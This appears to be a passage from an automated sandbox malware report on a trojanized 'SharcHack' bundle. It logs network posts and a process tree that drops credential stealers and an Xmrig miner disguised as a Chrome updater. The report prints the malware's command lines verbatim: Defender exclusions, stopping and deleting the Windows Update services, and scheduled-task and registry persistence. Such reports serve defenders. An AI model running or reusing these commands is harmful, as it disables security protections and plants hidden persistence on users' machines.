Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49943	65.9.108.93	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:58 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 357 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:21:58 UTC	357	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 d0 a1 68 65 61 74 d0 95 6e 67 69 6e 65 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 33 5c 22 2c 5c 22 37 5c 22 Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"heatngine\",\"18\":\"\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"3\",\"7\"
2024-12-28 21:21:59 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:21:59 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: dPzkLpy-497r_6POhQg6xJwh8RP9XJoEHvgJB8GUDGX3U59mm0iRtA==
2024-12-28 21:21:59 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49951	3.165.135.3	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:22:01 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 416 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:22:01 UTC	416	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:22:02 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:22:01 GMT Via: 1.1 49f259fbf0878ade02febf4980fecb18.cloudfront.net (CloudFront), 1.1 fa05633741160f5d7fda4a3fc2b1f1b0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: CDG52-P4 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: CDG52-P3 X-Amz-Cf-Id: 7yxW59bq2K1T4Rf2MQjPLh-SKSAb3GIXCklJHNRSyy7aepVFLB489g==

Target ID:	0
Start time:	16:19:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\SharcHack.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SharcHack.exe"
Imagebase:	0x400000
File size:	41'879'040 bytes
MD5 hash:	796310542E9FB2886DE3F8CBDF88C9FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:19:56
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\3.exe"
Imagebase:	0x7ff69af10000
File size:	3'715'584 bytes
MD5 hash:	A4C45AAF11FC601009A5682FD23790EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:19:57
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:19:57
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:19:57
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"
Imagebase:	0x400000
File size:	8'068'096 bytes
MD5 hash:	9F4F298BCF1D208BD3CE3907CFB28480
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:20:00
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\CheatEngine75.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
Imagebase:	0x400000
File size:	30'016'928 bytes
MD5 hash:	CCEF241F10766A2E12298FBA4D319450
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	16:20:00
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\v2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\v2.exe"
Imagebase:	0xaa0000
File size:	278'016 bytes
MD5 hash:	3F62213D184B639A0A62BCB1E65370A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: infostealer_win_lighting, Description: Detect the Lighting infostealer based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:20:02
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
Imagebase:	0x400000
File size:	3'210'656 bytes
MD5 hash:	E652D75D1D0D3F03B6B730E064E9194C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:20:10
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:20:11
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:20:11
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:20:11
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:20:11
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:20:11
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:20:12
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:20:12
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	16:20:12
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	16:20:12
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:20:12
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:20:24
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:20:24
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	16:20:25
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Imagebase:	0x7ff7c5040000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:20:25
Start date:	28/12/2024
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x7ff619070000
File size:	3'715'584 bytes
MD5 hash:	A4C45AAF11FC601009A5682FD23790EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2634403580.00007FF619210000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:20:25
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	16:20:25
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
